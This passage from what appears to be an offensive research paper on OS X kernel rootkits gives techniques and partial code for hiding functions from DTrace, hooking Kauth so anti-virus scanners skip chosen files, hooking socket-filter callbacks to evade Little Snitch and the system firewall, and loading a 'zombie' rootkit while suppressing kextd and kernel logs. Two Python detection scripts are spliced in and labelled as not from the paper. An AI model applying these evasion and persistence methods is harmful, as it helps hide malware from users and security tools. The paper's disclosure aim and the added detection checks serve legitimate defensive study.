int fbt_invop(uintptr_t addr, uintptr_t *state, uintptr_t rval)
{
    fbt_probe_t *fbt = fbt_probetab[FBT_ADDR2NDX(addr)];

    for (; fbt != NULL; fbt = fbt->fbtp_hashnext) {
        if ((uintptr_t)fbt->fbtp_patchpoint == addr) {

            if (fbt->fbtp_roffset == 0) {
                x86_saved_state64_t *regs = (x86_saved_state64_t *)state;

                CPU->cpu_dtrace_caller = *(uintptr_t
*)(((uintptr_t)(regs->isf.rsp))+sizeof(uint64_t)); // 8(%rsp)
                /* 64-bit ABI, arguments passed in registers. */
                dtrace_probe(fbt->fbtp_id, regs->rdi, regs->rsi, regs->rdx,
regs->rcx, regs->r8); // <---------- call to dtrace functionality --------
                CPU->cpu_dtrace_caller = 0;
            } else {
                dtrace_probe(fbt->fbtp_id, fbt->fbtp_roffset, rval, 0, 0,
0);
                CPU->cpu_dtrace_caller = 0;
            }
            return (fbt->fbtp_rval); <- the emul value
        }
    }
    return (0);
}

fbt_invop finds probed address information stored in fbt_probetab array
and enters DTrace probe code. The return value that is needed for the
emulation is stored inside the structure. To fiddle with DTrace we
can emulate this function or create a modified fbt_perfCallback, adding
conditions to hide our own addresses. It contains no private symbols so
this is an easy task.

Next is a potential implementation of a hooked fbt_perfCallback function.
Please notice that not all the necessary code is implemented. It is a
mix of code and "algorithms".

kern_return_t
fbt_perfCallback_hooked(int trapno, x86_saved_state_t *tagged_regs,
                        uintptr_t *lo_spp, __unused int unused2)
{
    kern_return_t retval = KERN_FAILURE;
    x86_saved_state64_t *saved_state = saved_state64(tagged_regs);

    if (FBT_EXCEPTION_CODE == trapno && !IS_USER_TRAP(saved_state))
    {
        uintptr_t addr = saved_state->isf.rip;
        // XXX: verify if we want to hide this address
        //      remember that addr here is where illegal instruction
        //      occurred so our list must contain that info
        int addr_is_to_hide = hide_from_fbt(addr); // implement this
        if (addr_is_to_hide)
        {
            // XXX: find fbt_probetab symbol here so we can use it next

            // and now get the search starting point
            fbt_probe_t *fbt = fbt_probetab[FBT_ADDR2NDX(addr)];
            // find the structure for current addr
            for (; fbt != NULL; fbt = fbt->fbtp_hashnext)
            {
                if ((uintptr_t)fbt->fbtp_patchpoint == addr)
                {
                    // XXX: emulate all code inside fbt_perfCallback here
                    // except call to dtrace_invop()
                    // this is the code that is inside the first IF
                    // conditions in the original function a couple of
                    // symbols might need to be solved, easy!
                }
            }
            // add fail case here ? shouldn't be necessary unless a big
            // f*ckup occurs inside DTrace structures
        }
        // nothing to hide so call the original function
        else
        {
            kern_return_t ret = KERN_FAILURE;
            // XXX: don't forget we need to solve this symbol
            ret = fbt_perfCallback(trapno, tagged_regs, lo_spp, unused2);
            return ret;
        }
    }
    return retval;
}

Functions that we want to hide from DTrace will never reach its
probe system, effectively hiding them. The performance impact should
be extremely low unless there are too many functions to hide, and
hide_from_fbt() takes too long to execute.


----[ 6.3 - AV-Monster II

AV-Monster is an (old, Feb'12) PoC that exploits the Kauth interface
used by OS X anti-virus solutions [21]. Pardon me for bringing an old
subject to this paper but it perfectly illustrates an attack on Kauth,
and also because AV vendors, as far as I know, did nothing or very little
regarding this problem.

Apple recommends in [22] that anti-virus software install Kauth listeners
- they can receive file events and pass them to the scan engine. The
problem is that this creates a single point of failure that we can
(easily) exploit to bypass the scan engine and remain undetectable (AV
detection effectiveness discussion is out of scope ;-)).

A very basic AV scanning workflow is:
Execute file -> Kauth generates event -> AV kext listener -> AV scan
engine

It illustrates at least two distinct possibilities to *easily* bypass
the anti-virus. One is to patch Kauth and the other to patch the kext
listener. The old PoC code just NOPs the listener callback to render
it inoperative - the scanning engine stops receiving any events. This is
too noisy! A stealth implementation should just hijack that step and hide
the files we want to, as it is done with hiding files in the filesystem.

This time let me show you how to attack Kauth. The example will be based
on the KAUTH_FILEOP_OPEN action and open() syscall. To avoid unnecessary
browsing of XNU sources, this is the workflow up to the interesting point:

open() -> open_nocancel() -> open1()    [ bsd/vfs/vfs_syscalls.c ]
                               |
                               v
[ bsd/vfs/vfs_vnops.c ]  vn_open_auth() -> vn_open_auth_finish()
                                                    |
                                                    v
[ bsd/kern/kern_authorization.c ]        kauth_authorize_fileop()
                                                    |
                                                    v
                                        kauth_authorize_action()
                                                    |
                                                    v
                                             listener callback

I do not want to spam you with code but allow me to reprint the fileop
function:

int
kauth_authorize_fileop(kauth_cred_t credential, kauth_action_t action,
                       uintptr_t arg0, uintptr_t arg1)
{
        char            *namep = NULL;
        int             name_len;
        uintptr_t       arg2 = 0;

        /* we do not have a primary handler for the fileop scope so bail
         * out if there are no listeners.
         */
        if ((kauth_scope_fileop->ks_flags & KS_F_HAS_LISTENERS) == 0) {
                return(0);
        }

        if (action == KAUTH_FILEOP_OPEN || action == KAUTH_FILEOP_CLOSE ||
            action == KAUTH_FILEOP_EXEC) {
                /* get path to the given vnode as a convenience to our
                 * listeners.
                 */
                namep = get_pathbuff();
                name_len = MAXPATHLEN;
                if (vn_getpath((vnode_t)arg0, namep, &name_len) != 0) {
                        release_pathbuff(namep);
                        return(0);
                }
                if (action == KAUTH_FILEOP_CLOSE) {
                        /* close has some flags that come in via arg1 */
                        arg2 = arg1;
                }
                arg1 = (uintptr_t)namep;
        }
        kauth_authorize_action(kauth_scope_fileop, credential, action,
                               arg0, arg1, arg2, 0);

        if (namep != NULL) {
                release_pathbuff(namep);
        }
        return(0);
}

The purpose of this function is to pass some useful data to the
listener. In this case it is the vnode reference of the file and its
full path. Apple's documentation confirms it:

KAUTH_FILEOP_OPEN  Notifies that a file system object (a file
or directory) has been opened. arg0 (of type vnode_t) is a vnode
reference. arg1 (of type (const char *)) is a pointer to the object's
full path.

It is clear now that this is a great place to hijack and hide files
we do not want the AV to scan (or some other listener - this is also a
good feature for a file monitor). We just need to verify if current file
matches our list and return 0 if positive, else call the original code
(all these functions are not static so we can easily find the symbols).

And that's it. Simple, uh? :-)


----[ 6.4 - Little Snitch

Little Snitch is a popular application firewall that can blow up the
rootkit cover if network communications are needed and it's not taken
care of (nobody likes a snitch!). Socket filters are the OS X feature that
enables Little Snitch to easily intercept and control (network) sockets
without need for hooking or any other (unstable/dubious) tricks. They
can filter inbound or outbound traffic on a socket and also out-of-band
communication [17].

The installation of a socket filter is done using the sflt_register()
function, for each domain, type, and protocol socket. Little Snitch
loops to install the filter in all possible socket combinations.

extern errno_t sflt_register(const struct sflt_filter *filter,
                             int domain,
                             int type,
                             int protocol);

The interesting detail of sflt_register() is the sflt_filter structure
[bsd/sys/kpi_socketfilter.h]. It contains a series of callbacks for
different socket operations:

struct sflt_filter {
 sflt_handle                     sf_handle;
 int                             sf_flags;
 char                            *sf_name;
 sf_unregistered_func            sf_unregistered;
 sf_attach_func                  sf_attach; // handles attaches to sockets.
 sf_detach_func                  sf_detach;
 sf_notify_func                  sf_notify;
 sf_getpeername_func             sf_getpeername;
 sf_getsockname_func             sf_getsockname;
 sf_data_in_func                 sf_data_in; // handles incoming data.
 sf_data_out_func                sf_data_out;
 // handles inbound connections.
 sf_connect_in_func              sf_connect_in;
 sf_connect_out_func             sf_connect_out;
 sf_bind_func                    sf_bind; // handles binds.
 (...)
}

History repeats itself and once again the easiest way is to hook
the function pointers and do whatever we want. The Little Snitch driver
(it's an I/O Kit driver and not a kernel extension) loads very early so
hooking sflt_register() and modifying the structure on the fly is not
very interesting. We need to look up the structure in kernel memory and
modify it.

Many different socket filters can be attached to the same socket so there
must be a data structure holding this information. The interesting source
file is bsd/kern/kpi_socketfilter.c, where a tail queue is created and
referenced using a static variable sock_filter_head.

struct socket_filter {
        TAILQ_ENTRY(socket_filter)      sf_protosw_next;
        TAILQ_ENTRY(socket_filter)      sf_global_next;
        struct socket_filter_entry      *sf_entry_head;

        struct protosw                  *sf_proto;
        struct sflt_filter              sf_filter;
        u_int32_t                       sf_refcount;
};

TAILQ_HEAD(socket_filter_list, socket_filter);
static struct socket_filter_list        sock_filter_head;

There are a few functions referencing sock_filter_head and
the disassembler can be helpful to find the correct location
(sflt_attach_internal() is a good candidate). Using gdb attached to
kernel and sock_filter_head address:

gdb$ print *(struct socket_filter_list*)0xFFFFFF800EAAC9F8
$1 = {
  tqh_first = 0xffffff8014811f08,
  tqh_last = 0xffffff8014898e18
}

(sock_filter_head located at 0xFFFFFF80008AC9F8 in 10.8.2 plus KASLR of
0xe200000 in this example)

Iterating around the tail queue we find the Little Snitch socket filter:

gdb$ print *(struct socket_filter*)0xffffff801483e608
$7 = {
  sf_protosw_next = {
    tqe_next = 0x0,
    tqe_prev = 0xffffff8014811f08
  },
  sf_global_next = {
    tqe_next = 0xffffff801483e508,
    tqe_prev = 0xffffff801483e718
  },
  sf_entry_head = 0xffffff801b29a1c8,
  sf_proto = 0xffffff800ea2bca0,
  sf_filter = {
    sf_handle = 0x27e3ea,
    sf_flags = 0x5,
    sf_name = 0xffffff7f8eb1357b "at_obdev_ls",
    sf_unregistered = 0xffffff7f8eb0938f,
    sf_attach = 0xffffff7f8eb093f9,
    sf_detach = 0xffffff7f8eb09539,
    sf_notify = 0xffffff7f8eb095e8,
    sf_getpeername = 0xffffff7f8eb096a4,
    sf_getsockname = 0xffffff7f8eb09707,
    sf_data_in = 0xffffff7f8eb0974f,
    sf_data_out = 0xffffff7f8eb09bfa,
    sf_connect_in = 0xffffff7f8eb0a076,
    sf_connect_out = 0xffffff7f8eb0a295,
    sf_bind = 0xffffff7f8eb0a446,
    sf_setoption = 0xffffff7f8eb0a4ff,
    sf_getoption = 0xffffff7f8eb0a547,
    sf_listen = 0xffffff7f8eb0a58f,
    sf_ioctl = 0xffffff7f8eb0a612,
    sf_ext = {
      sf_ext_len = 0x38,
      sf_ext_accept = 0xffffff7f8eb0a65a,
      sf_ext_rsvd = {0x0, 0x0, 0x0, 0x0, 0x0}
    }
  },
  sf_refcount = 0x17
}

The sf_name field from sflt_filter structure can be used to match
the correct socket filter, otherwise we would have to find the driver
addresses and match the function pointers that belong to that address
space.

Different possibilities exist to hide our network connections
from Little Snitch and also Apple's application firewall (named
com.apple.nke.applicationfirewall). The easiest one is to patch or
hook the sf_attach callback. Documentation from the previously mentioned
include file:

/*!
 @typedef sf_attach_func

 @discussion sf_attach_func is called to notify the filter it has been
attached to a socket. The filter may allocate memory for this attachment
and use the cookie to track it. This filter is called in one of two cases:
  1) You've installed a global filter and a new socket was created.
  2) Your non-global socket filter is being attached using the SO_NKE
socket option.
 @param cookie Used to allow the socket filter to set the cookie for this
attachment.
 @param so The socket the filter is being attached to.
 @result If you return a non-zero value, your filter will not be attached
to this socket.
*/
typedef errno_t (*sf_attach_func)(void  **cookie, socket_t so);

Forcing the callback to return a non-zero value will effectively take
socket filter firewalls out of the equation. The problem here is that
the socket_t structure might not have enough information to distinguish
the cases we want to hide - it is too early in the process so there is
no address to connect to. There are two fields that contain the PID
information of the last process to interact with the socket so this can
be useful if we already know the PID to hide connection from/to.

The other callbacks contain "richer" information for our purposes,
in particular the structure sockaddr. If you want/need this type of
fine-grain control you should hook here and use that structure to
make your hide or not decision. As an exercise, to dump the target
address you can attach gdb to the kernel and use the kgmacros command
"showsockaddr" on that argument address (assuming you are breakpointing
at the callback address).

Another piece of information that can be used to tell which process
is related to the current socket is the cookie that is set in the attach
callback and passed along to almost all other callbacks. The cookie is a
user-defined structure and the following is a partial reverse of Little
Snitch's definition:

struct Cookie
{
(...)
0x48: IOLock *lock;
0x74: pid_t pid; // process to whom the socket belongs to
0x78: int32_t count;
0x7C: int32_t *xxx;
0x80: int32_t protocol;
0x85: int8_t domain;
0x86: int8_t type;
(...)
}

As in Kauth, the socket filters create a single point of failure where we
can easily hook and filter our "evil" connections. The real difficulty is
to find the head of the socket filter tail queue. Having a disassembler
in the rootkit makes this an easy task, opening the door to easily bypass
application firewalls.
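
Seen from the defensive side, the same sf_name / address-space observation
gives an integrity check. The following is an added example, not code from
the paper or its sample archive: it parses the gdb output printed above and
reports any socket filter callback that does not live in the same image as
the filter's name string. The load ranges and the tampered pointer value
are constructed for the example.

```python
import re

# sf_filter portion of the gdb output printed in the article.
GDB_DUMP = """\
  sf_filter = {
    sf_handle = 0x27e3ea,
    sf_flags = 0x5,
    sf_name = 0xffffff7f8eb1357b "at_obdev_ls",
    sf_unregistered = 0xffffff7f8eb0938f,
    sf_attach = 0xffffff7f8eb093f9,
    sf_detach = 0xffffff7f8eb09539,
    sf_notify = 0xffffff7f8eb095e8,
    sf_getpeername = 0xffffff7f8eb096a4,
    sf_getsockname = 0xffffff7f8eb09707,
    sf_data_in = 0xffffff7f8eb0974f,
    sf_data_out = 0xffffff7f8eb09bfa,
    sf_connect_in = 0xffffff7f8eb0a076,
    sf_connect_out = 0xffffff7f8eb0a295,
    sf_bind = 0xffffff7f8eb0a446,
    sf_setoption = 0xffffff7f8eb0a4ff,
    sf_getoption = 0xffffff7f8eb0a547,
    sf_listen = 0xffffff7f8eb0a58f,
    sf_ioctl = 0xffffff7f8eb0a612,
    sf_ext = {
      sf_ext_len = 0x38,
      sf_ext_accept = 0xffffff7f8eb0a65a,
      sf_ext_rsvd = {0x0, 0x0, 0x0, 0x0, 0x0}
    }
  },
"""

# Constructed variant: one callback redirected to an address outside the image.
TAMPERED = GDB_DUMP.replace("sf_attach = 0xffffff7f8eb093f9",
                            "sf_attach = 0xffffff80392ba724")

# Callback fields of struct sflt_filter as they appear in the gdb output.
CALLBACKS = (
    "sf_unregistered", "sf_attach", "sf_detach", "sf_notify",
    "sf_getpeername", "sf_getsockname", "sf_data_in", "sf_data_out",
    "sf_connect_in", "sf_connect_out", "sf_bind", "sf_setoption",
    "sf_getoption", "sf_listen", "sf_ioctl", "sf_ext_accept",
)

# Constructed load ranges (label, base, size). On a real system they would
# come from the list of loaded images; these are not values from the article.
RANGES = [
    ("kernel", 0xffffff800e400000, 0x800000),
    ("socket filter kext", 0xffffff7f8eb05000, 0x10000),
]

FIELD_RE = re.compile(r'(\w+) = (0x[0-9a-fA-F]+)(?: "([^"]*)")?')


def parse_filter(dump):
    """Return (filter name, address of the name string, {callback: address})."""
    name, name_ptr, callbacks = None, None, {}
    for field, value, text in FIELD_RE.findall(dump):
        if field == "sf_name":
            name, name_ptr = text, int(value, 16)
        elif field in CALLBACKS:
            callbacks[field] = int(value, 16)
    return name, name_ptr, callbacks


def owner_of(addr, ranges):
    """Label of the range containing addr, or None if nothing backs it."""
    for label, base, size in ranges:
        if base <= addr < base + size:
            return label
    return None


def audit_filter(dump, ranges):
    """List (field, address, containing range) for callbacks that do not
    live in the image holding the filter's name string."""
    _, name_ptr, callbacks = parse_filter(dump)
    if name_ptr is None:
        raise ValueError("no sf_name field in dump")
    owner = owner_of(name_ptr, ranges)
    findings = []
    for field, addr in callbacks.items():
        if addr == 0:          # callback not implemented by the filter
            continue
        where = owner_of(addr, ranges)
        if owner is None or where != owner:
            findings.append((field, addr, where))
    return findings


if __name__ == "__main__":
    for label, dump in (("original", GDB_DUMP), ("tampered", TAMPERED)):
        for field, addr, where in audit_filter(dump, RANGES):
            print(f"{label}: {field} -> {addr:#x} ({where or 'no loaded image'})")
```

A pointer check like this only catches redirected callbacks; a callback
whose body was patched in place still points into the right image and has
to be compared against the on-disk code instead.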


----[ 6.5 - Zombie rootkits

The idea here is to explore kernel memory allocations and leaks. Kernel
and kernel extensions share the same memory map, kernel_map, and there
are a few kernel functions "families" to allocate kernel memory:

- kalloc.
- kmem_alloc.
- OSMalloc.
- MALLOC/FREE.
- IOMalloc/IOFree for I/O Kit.

All functions are wrappers for kernel_memory_allocate(). For additional
information check [30], [31] Chapter 6, [13] Chapter 12.

My initial (too complicated) idea was to load the rootkit, hook whatever
was needed, unload the rootkit, and then protect the memory that was
used. This was based on the fact that unloading does not destroy the
rootkit memory so everything would work as long as those blocks of memory
were not reallocated to something else. I wanted to edit the kernel
memory map and mark those pages as used.

If we have a rootkit running that is not associated with a kernel
extension we kind of have a zombie rootkit and solve a few problems such
as no need to hide from kextstat, no kernel extension structures to find,
etc. I later found out that Hoglund and Butler had a similar idea in
[32] when they describe the NonPagedPool memory trick - allocate memory
in that area, copy the rootkit, and unload the driver. New ideas are
tough to have :-).

Back to the original point...
Simple things usually work better so there is no point in starting with
the complicated method. The easiest way is to create a memory leak and
use it to store the zombie rootkit version. When the original kernel
extension is unloaded all the memory that was previously allocated using
one of the functions above (tested with kalloc and _MALLOC) will not be
free'd, creating a kernel memory leak that we can abuse and profit from.

The beloved ASCII diagram:

load rootkit -> find rootkit -> calculate rootkit -> alloc zombie
                base address          size             memory
                                                          |
                                                          v
unload original <- transfer control <- fix memory <- copy rootkit into
   rootkit            to zombie        protections     zombie memory

To unload the original rootkit is extremely easy - we do not need to
execute any additional command, just return KERN_FAILURE from the start
function and the rootkit will not be loaded. The zombie rootkit already
gained control before this so there is no problem and we avoid executing
a kextunload command. Simple :-).

The control transfer to zombie code has a small caveat inherited from
the previous paragraph - the start function must return a value so we
can't simply jump into the zombie. Two ideas come to my mind to solve
this problem; first we can hook some kernel function and there transfer
control to zombie, second we can use kernel threads - create a new thread
and let the main one return.

To create a kernel thread the function kernel_thread_start() can be used
(include <kern/thread.h> and Mach KPI). Its prototype is:

kern_return_t
kernel_thread_start(thread_continue_t continuation, void *parameter,
thread_t *new_thread);

Continuation parameter is a C function pointer where new thread will start
execution, parameter is data that we might want to pass to the new thread,
and new_thread a thread reference that the caller is responsible for.

The zombie thread start function should have a prototype like this:

void start_thread(void *parameter, wait_result_t wait)

To set the start function pointer we need to find that function address
in the zombie memory. Symbol information is not available (__LINKEDIT
segment is not loaded) and to avoid reading from the filesystem we can
use a quick trick - find the rootkit base address and find the difference
to the address of start function in the rootkit (since that is in the
original rootkit code). Since we have the zombie start address returned
from the memory allocation, we just need to add the difference and we
have the location of the start function inside the zombie. Having computed
the function pointer, we can now pass it to kernel_thread_start() and be
sure that zombie code will execute.

Next problem...

Copying the original rootkit into the new area invalidates the external
symbols solved when kernel extension was loaded. Kernel extension code
is position independent (PIC) so calls are made referencing the current
instruction address. If we modify the location address and maintain
the offset, then the symbol is not valid anymore and most probably will
generate a kernel panic when executed.

Example:
Rootkit loaded in memory:
gdb$ x/10i 0xffffff7f83ad671c
0xffffff7f83ad671c:  55                        push   rbp
0xffffff7f83ad671d:  48 89 e5                  mov    rbp,rsp
0xffffff7f83ad6720:  48 8d 3d d1 09 00 00      lea    rdi,[rip+0x9d1]
# 0xffffff7f83ad70f8 <- string reference
0xffffff7f83ad6727:  30 c0                     xor    al,al
0xffffff7f83ad6729:  5d                        pop    rbp
0xffffff7f83ad672a:  e9 61 29 35 7f            jmp    0xffffff8002e29090 <-
call to kernel's printf, solved when kext was loaded

The zombie copy:
gdb$ x/10i 0xffffff80392ba724
0xffffff80392ba724:  55                        push   rbp
0xffffff80392ba725:  48 89 e5                  mov    rbp,rsp
0xffffff80392ba728:  48 8d 3d d1 09 00 00      lea    rdi,[rip+0x9d1]
# 0xffffff80392bb100 <- string reference will be valid
0xffffff80392ba72f:  30 c0                     xor    al,al
0xffffff80392ba731:  5d                        pop    rbp
0xffffff80392ba732:  e9 61 29 35 7f            jmp    0xffffff80b860d098 <-
this is a random address and will crash when we call this function

I am not sure if there is a better solution but I opted to manually
fix the offsets in the zombie code (probably influenced by the quick
trick to find the thread start function). My idea is to build a table
of all external symbols we will need to fix (hardcoded string table or
read kext symbol tables from disk) and solve their addresses. With this
information we can disassemble the kernel and find all references, and
also compute the (reference's) difference to the rootkit base address.

The final step is to fix the offsets in the zombie references. We
have the difference for each reference so we can calculate where each
reference is located in the zombie memory and recompute the new offset
to the external symbol. References to the __DATA segment do not need to
be fixed - the offsets remain valid since that segment was copied and
relative distance remains the same. Maybe a bit too much work but the
disassembler engine makes this rather easy to accomplish. If you have
a better solution I am eager to read about it.

Returning KERN_FAILURE to kextload will generate noisy log messages
about the rootkit.

/var/log/system.log:
May  7 02:26:10 mountain-lion-64.local com.apple.kextd[12]: Failed to load
/Users/reverser/the_flying_circus.kext - (libkern/kext) kext (kmod)
start/stop routine failed.

dmesg:
Kext put.as.the-flying-circus start failed (result 0x5).
Kext put.as.the-flying-circus failed to load (0xdc008017).
Failed to load kext put.as.the-flying-circus (error 0xdc008017).

The dmesg output can be silenced by temporarily patching OSKextLog
function or by directly memory patching the binaries that call this
function. The fastest and easiest way is to do it inside the kernel -
solve the symbol and patch the first instruction to a ret. After rootkit
is loaded we can restore original byte and everything is back to normal.

The syslog output is generated by kextd daemon. Two quick solutions
come to my mind - one is to patch syslogd as described before, another
is to patch kextd. The symbol used to send the message to syslogd
is asl_vlog. It is an external symbol in kextd. The symbol stub can
be temporarily patched into a ret to avoid failure logging. Find the
kextd process from process list, process its Mach-O header and locate
the symbol stub address in __stubs section. Nothing very complicated!

To detect when to restore the logging features, we can use a quick and
dirty hack. Loop inside the zombie thread until kextload process is
finished. Then the original bytes can be restored and it's business as
usual but with a zombie rootkit loaded.

The foundation blocks to zombie rootkits are exposed, the remaining are
implementation details that do not matter much here and can be found in
the attached sample code.
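
The log entries quoted above are the trace this loading trick leaves when
logging is intact, so they are worth alerting on. The following is an added
example, not code from the paper or its sample archive: it scans
system.log and dmesg lines for kexts whose start routine failed and notes
where the bundle was loaded from. The list of standard kext directories and
the second system.log line are assumptions of the example.

```python
import re

# Log lines printed in the article; the wrapped system.log entry is joined
# back onto one line. The second system.log line is constructed.
SYSTEM_LOG = [
    "May  7 02:26:10 mountain-lion-64.local com.apple.kextd[12]: Failed to "
    "load /Users/reverser/the_flying_circus.kext - (libkern/kext) kext "
    "(kmod) start/stop routine failed.",
    "May  7 02:26:12 mountain-lion-64.local example[99]: unrelated message",
]
DMESG = [
    "Kext put.as.the-flying-circus start failed (result 0x5).",
    "Kext put.as.the-flying-circus failed to load (0xdc008017).",
    "Failed to load kext put.as.the-flying-circus (error 0xdc008017).",
]

KERN_FAILURE = 5  # value of KERN_FAILURE in mach/kern_return.h

# Assumption of this example: kexts are normally loaded from these places.
STANDARD_DIRS = ("/System/Library/Extensions/", "/Library/Extensions/")

KEXTD_RE = re.compile(
    r"^(?P<time>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) "
    r"com\.apple\.kextd\[\d+\]: Failed to load (?P<path>.+?\.kext) - "
    r"(?P<reason>.+)$")
START_RE = re.compile(
    r"^Kext (?P<id>\S+) start failed \(result (?P<code>0x[0-9a-fA-F]+)\)\.$")
LOAD_RE = re.compile(
    r"^Kext (?P<id>\S+) failed to load \((?P<code>0x[0-9a-fA-F]+)\)\.$")


def scan_kextd(lines):
    """kextd load failures from system.log: time, path, reason, location."""
    events = []
    for line in lines:
        m = KEXTD_RE.match(line)
        if m:
            path = m.group("path")
            events.append({
                "time": m.group("time"),
                "path": path,
                "reason": m.group("reason"),
                "standard_dir": path.startswith(STANDARD_DIRS),
            })
    return events


def scan_kernel(lines):
    """Per bundle id, the start result and load error seen in dmesg."""
    kexts = {}
    for line in lines:
        for key, rx in (("start_result", START_RE), ("load_error", LOAD_RE)):
            m = rx.match(line.strip())
            if m:
                entry = kexts.setdefault(
                    m.group("id"), {"start_result": None, "load_error": None})
                entry[key] = int(m.group("code"), 16)
    return kexts


def findings(system_log, dmesg):
    """Human-readable findings for kexts whose start routine failed."""
    out = []
    for ev in scan_kextd(system_log):
        if "start/stop routine failed" in ev["reason"]:
            where = "standard" if ev["standard_dir"] else "non-standard"
            out.append(f'{ev["time"]} kextd: start routine failed for '
                       f'{ev["path"]} ({where} location)')
    for bundle, codes in sorted(scan_kernel(dmesg).items()):
        if codes["start_result"] == KERN_FAILURE:
            err = codes["load_error"]
            detail = f", load error {err:#x}" if err is not None else ""
            out.append(f"kernel: {bundle} start returned KERN_FAILURE{detail}")
    return out


if __name__ == "__main__":
    for line in findings(SYSTEM_LOG, DMESG):
        print(line)
```

As the text above explains, both log paths can be silenced while the kext
loads, so an empty result says nothing about a host that is already
compromised; the check is useful for logs shipped off the machine as they
are written.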


--[ 7 - Caveats & Detection

Writing rootkits is a dangerous and unstable game and that is why it is
such a fun game (or work for those doing it for money). You are always
at the mercy of subtle or major changes that can ruin all your efforts and
uncloak your toy. Nevertheless, these are the same reasons why writing
rootkits is so fun - you need to make it as stable and future-proof
as possible, and try to think of all the different detection paths. It
is a never-ending story, quite frustrating at times but mentally and
creatively challenging.

This paper is considerably huge but still incomplete! There are a few
missing areas and you probably spotted a few problems with some of its
approaches. Let me try to describe some.

One of the main problems is the dependency on proc, task and some other
structures. These are opaque to outsiders for one good reason - they
are changed frequently between major OS X versions. For example, when I
was researching I forgot to include a define and things were not working
(lucky or not it was not crashing the test system). Three different proc_t
(and task_t) versions must be included to create a rootkit compatible
with the three latest major OS X versions. And it is most certain that
it will break with a new major release.

In practice there is at least one rather easy way to overcome this
difficulty. The effective number of fields required from proc and task
structures is small. We can resort to information "leaks" from functions
referencing those fields and retrieve the structure offset. Including a
disassembler in the rootkit makes this task easier and safer. There are
many suitable functions - small, stable, and with very few different
structures and variables. Many are static, but the number of exported
ones is more than enough for this purpose.

Filesystem checks (offline in particular) are a significant threat
to rootkits, especially when there is a good reference baseline. Good
rootkits must try to keep their filesystem (and memory) footprint to a
minimum. One of the usual weakest points is the rootkit startup. It must
be initialised somewhere! OS X features so many places where this can
happen but this information is available to both defensive and offensive
sides. Binaries modification (for example, kernel extension injection
as featured in last Phrack) is a good method but (easily) detectable by
checksum checks.

Regarding this problem, we can try to abuse additional features. OS X
contains many data files that are mutable (sqlite3 databases, for example)
and by nature difficult to checksum. A potential vulnerability using
these data files could be explored and all the rootkit code stored
there. Nothing new here, just remembering additional attacking and
storage points.

Extreme care is required with rootkit's code - it must be as bug free
as possible so that any inconsistencies and/or bugs do not reveal its
presence, and must be carefully designed, for example, authentication
and encryption on all communications. It is quite a joke that a simple
ioctl call can expose OS.X/Crisis [4]. There is a "rule" - if it runs,
it can be reversed. But let's not make that so easy, ok?

Duplicating functions to use with the trampoline trick is also a
potential source of problems if those functions are changed in new
versions. This can be avoided by using the original functions - modify
the call references or hijack the function and return to the original
one. Using the NOP alignment space allows us to keep pointers and
references inside the kernel memory address space and less suspicious
to an initial analysis.

Detection and creation of tools is the next logical step. OS X lacks this
kind of tools and here lies a good opportunity for future research and
development. The defensive side against rootkits is even more challenging
and requires additional creativity (and maybe kernel knowledge) to
develop safer and reliable detection methods. The challenge is issued :-).


--[ 8 - Final words

This was a long paper and I sincerely hope it was useful in some way
to you who had the time and patience to read it. New ideas are hard to
come by and there (probably) are many here that were somehow previously
explored by others. Please forgive me for any missing attribution - it
is only because I do not know or I am not aware who is the original
author/source. It is particularly difficult when you read so much stuff
thru the years.

The full disclosure discussion is extremely complicated and impossible to
reach consensus on. Full source code is hereby released because I believe
it is the only (viable) alternative to move things forward and call
for additional research and solutions. OS X is a great platform but it
(still) suffers from an invincibility mystique that is false and
dangerous. There are companies producing commercial rootkits sold to
governments to potentially spy on citizens (they say criminals, we have
no idea since there is no transparency).

Obviously these tools can be used for legitimate purposes (such as
tracking real bad guys) but also not so legitimate ones - power corrupts
and the temptation to spy on and control everyone is too big. A balance is
required and it can come from improved research and defensive tools.
Scoffing at the low incentives or potential difficulties is not the
solution - history has shown that there is always someone who will leap
forward and break the establishment.

This paper's goal is not to assist in developing a surveillance dissident
death machine (name kindly suggested by thegrugq!) but to show the
different ways it can be built, and how to detect and protect against
them. I can't avoid its potential bad usage but at least it should make
the playing field a bit more balanced.

Greets to nemo, noar, snare, all my put.as friends (saure, od, spico,
kahuna, emptydir, korn, g0sh, ...), thegrugq, diff-t, tal0n and everyone
else at C., the blog readers and #osxre boys & girls.

And a big middle finger to Apple as a company, born from the hacking
spirit and now transformed against hacking.

Enjoy & have fun,
fG!


--[ 9 - References

[1] ghalen and wowie, Developing Mac OSX kernel rootkits
    http://www.phrack.org/issues.html?issue=66&id=16&mode=txt

[2] prdelka, Rubilyn 0.0.1
    http://www.nullsecurity.net/tools/backdoor.html

[3] 0xfeedbeef, volafox : rubilyn Rootkit Analysis
    http://feedbeef.blogspot.pt/2012/10/volafox-rubilyn-rootkit-analysis.html

[4] fG!, Tales from Crisis
    http://reverse.put.as/2012/08/06/tales-from-crisis-chapter-1-the-droppers-box-of-tricks/

[5] snare, Resolving kernel symbols
    http://ho.ax/posts/2012/02/resolving-kernel-symbols/

[6] Landon Fuller, Fixing ptrace(pt_deny_attach, ...) on Mac OS X 10.5
    Leopard
    http://landonf.bikemonkey.org/code/macosx/Leopard_PT_DENY_ATTACH.20080122.html

[7] Miller, Charlie & Zovi, Dino Dai, The Mac Hacker's Handbook
    Wiley Publishing, 2009, ISBN: 978-0-470-39536-3

[8] Wikipedia, Interrupt descriptor table
    http://en.wikipedia.org/wiki/Interrupt_descriptor_table

[9] fG!, bruteforcesysent
    https://github.com/gdbinit/bruteforcesysent

[10] OS X ABI Mach-O File Format Reference
     https://developer.apple.com/library/mac/#documentation/developertools/conceptual/MachORuntime/Reference/reference.html

[11] fG!, Secuinside 2012, How to Start your Apple reverse engineering
     adventure
     http://reverse.put.as/wp-content/uploads/2012/07/Secuinside-2012-Presentation.pdf

[12] fG!, Hitcon 2012, Past and Future in OS X malware
     http://reverse.put.as/Hitcon_2012_Presentation.pdf

[13] Jonathan Levin, Mac OS X and iOS Internals
     Wiley & Sons, 2012, ISBN: 978-1-11805765-0

[14] Amit Singh, Mac OS X Internals
     Addison Wesley, 2007, ISBN: 0-321-27854-2

[15] Apple, dyld 210.2.3 source code
     http://www.opensource.apple.com/source/dyld/dyld-210.2.3/

[16] fG!, Anti-debug trick #1: Abusing Mach-O to crash GDB
     http://reverse.put.as/2012/01/31/anti-debug-trick-1-abusing-mach-o-to-crash-gdb/

[17] Apple, Network Kernel Extensions Programming Guide
